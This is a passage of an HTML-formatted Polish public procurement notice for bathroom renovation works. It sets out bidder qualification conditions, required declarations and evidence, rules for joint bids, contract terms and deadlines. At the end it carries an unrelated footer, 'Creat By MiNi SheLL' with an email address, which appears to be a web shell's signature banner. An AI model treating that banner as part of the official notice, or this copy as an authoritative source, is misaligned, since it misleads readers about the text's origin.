zakresie.<br/><br/>5.2.2. uprawnień do prowadzenia określonej działalności gospodarczej<br/>lub zawodowej:<br/>Zamawiający nie określa warunku w ww. zakresie.<br/><br/>5.2.3. sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca przedstawi dokument<br/>potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej<br/>w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, tj.<br/>wykonywania robót budowlanych na sumę gwarancyjną nie mniejszą niż<br/>500 000,00 PLN.<br/><br/>5.2.4. zdolności technicznej lub zawodowej.<br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie), wykonał należycie co najmniej dwie<br/>roboty budowlane, polegające na wykonaniu prac remontowych łazienek, o<br/>wartości co najmniej 500 000 złotych brutto każda,<br/>wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów,<br/>na rzecz których roboty te zostały wykonane wraz z załączeniem dowodów<br/>określających czy te roboty budowlane zostały wykonane należycie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">(numeracja zgodna z SWZ)<br/><br/>6.1. W celu wykazania braku podstaw do wykluczenia, określonych w Rozdziale 5 SWZ, wykonawcy muszą złożyć wraz z ofertą następujące oświadczenia i dokumenty:<br/><br/>6.1.1. Aktualne na dzień składania ofert oświadczenia w zakresie wskazanym<br/>w Załączniku Nr 5 do SWZ. Informacje zawarte w oświadczeniach będą stanowić wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu<br/>z postępowania.<br/><br/>Oświadczenia należy złożyć w postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/><br/>6.1.3. Wykonawca, który powołuje się na zasoby podmiotów udostępniających zasoby, przedstawia wraz z oświadczeniami, o których mowa w pkt 6.1.1 także oświadczenia podmiotu udostępniającego zasoby, zgodnie ze wzorami stanowiącymi Załącznik nr 7 do SWZ, potwierdzające brak podstaw wykluczenia tego podmiotu.<br/><br/>Oświadczenia należy złożyć w postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/><br/>6.2. Dokumenty składane na wezwanie zamawiającego. Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych, aktualnych na dzień złożenia:<br/><br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/><br/>d) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 1616), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi Załącznik nr 9 do SWZ;<br/><br/>e) dokumentów dotyczących podmiotów udostępniających zasoby, w celu wykazania braku istnienia wobec nich podstaw wykluczenia – jeżeli wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby.<br/><br/>6.3. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 6.2 lit. a) składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument ten powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">(numeracja zgodna z SWZ)<br/><br/>6.1. W celu potwierdzenia spełniania warunków udziału w postępowaniu, określonych w Rozdziale 5 SWZ wykonawcy muszą złożyć wraz z ofertą następujące oświadczenia i dokumenty:<br/><br/>6.1.1. Aktualne na dzień składania ofert oświadczenia w zakresie wskazanym<br/>w Załączniku Nr 4 do SWZ. Informacje zawarte w oświadczeniach będą stanowić wstępne potwierdzenie, że wykonawca spełnia warunki udziału w postępowaniu.<br/><br/>Oświadczenia należy złożyć w postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/><br/>6.1.3. Wykonawca, który powołuje się na zasoby podmiotów udostępniających zasoby, przedstawia wraz z oświadczeniami, o których mowa w pkt 6.1.1 także oświadczenia podmiotu udostępniającego zasoby, zgodnie ze wzorami stanowiącymi Załącznik nr 6 do SWZ, potwierdzające spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/><br/>6.1.4. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt 5.5.1 i 5.5.3 SWZ – jeżeli wykonawca polega na zdolnościach lub sytuacji podmiotu udostępniającego zasoby. Zobowiązanie należy złożyć w postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/><br/>Oświadczenia należy złożyć w postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/><br/>6.2. Dokumenty składane na wezwanie zamawiającego. Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych, aktualnych na dzień złożenia:<br/><br/>b) dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności<br/>cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia tj.<br/>wykonywania robót budowlanych, na sumę gwarancyjną w wysokości co najmniej 500 000,00<br/>zł;<br/><br/>c) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane,<br/>a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty. Wzór wykazu stanowi Załącznik nr 8 do SWZ;<br/><br/>e) dokumentów dotyczących podmiotów udostępniających zasoby, w celu wykazania spełnienia warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na ich zdolności lub sytuację – jeżeli wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> (numeracja zgodna z SWZ)<br/><br/>8.11. Na potrzeby oceny ofert oferta musi zawierać:<br/>8.11.1. Formularz Ofertowy sporządzony i wypełniony według wzoru stanowiącego Załącznik<br/>Nr 2 wraz z kosztorysem ofertowym, stanowiącym Załącznik nr 2A do SWZ;<br/>8.11.2. oświadczenie, o którym mowa w pkt 5.8 według wzoru stanowiącego Załącznik nr 3 do<br/>SWZ – jeżeli dotyczy;<br/>8.11.3. oświadczenia, o których mowa w pkt 6.1.1 według wzorów stanowiących Załącznik nr 4<br/>i 5 do SWZ;<br/>8.11.4. pełnomocnictwo do reprezentowania wykonawcy (wykonawców występujących<br/>wspólnie), o ile ofertę składa pełnomocnik;<br/>8.11.5. oświadczenia podmiotu udostępniającego zasoby, o których mowa w pkt 6.1.3 według<br/>wzorów stanowiących Załącznik nr 6 i 7 do SWZ – jeżeli wykonawca polega na<br/>zdolnościach lub sytuacji podmiotu udostępniającego zasoby;<br/>8.11.6. zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt 5.5.1 i 5.5.4 –<br/>jeżeli wykonawca polega na zdolnościach lub sytuacji podmiotu udostępniającego<br/>zasoby.<br/>8.12. Jeśli w dokumentacji załączonej do SWZ wskazany został obowiązek złożenia innych<br/>dokumentów, wiążące dla Wykonawcy są jedynie dokumenty określone w pkt 8.11. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> (numeracja zgodna z SWZ)<br/><br/>5.6. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu<br/>o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy<br/>w sprawie zamówienia publicznego. Pełnomocnictwo w postaci elektronicznej, opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym należy dołączyć do oferty.<br/><br/>Pełnomocnictwo powinno potwierdzać prawidłowość umocowania na dzień złożenia oferty. W przypadku, gdy pełnomocnictwo zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem, wykonawca przekazuje cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, potwierdzającym zgodność odwzorowania cyfrowego z dokumentem w postaci papierowej. Potwierdzenia zgodności odwzorowania cyfrowego z dokumentem w postaci papierowej pełnomocnictwa dokonuje notariusz lub mocodawca.<br/><br/>5.7. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>W odniesieniu do warunków dotyczących doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych<br/>z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/><br/>5.8. W przypadku, o którym mowa w pkt 5.7, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi załącznik nr 3 do SWZ.<br/><br/>6.1.2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenia, o których mowa w pkt 6.1.1 składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia mają potwierdzać brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> W zakresie określonym we wzorze umowy stanowiącym Załącznik nr 1 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia-mos.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-22 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-10-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com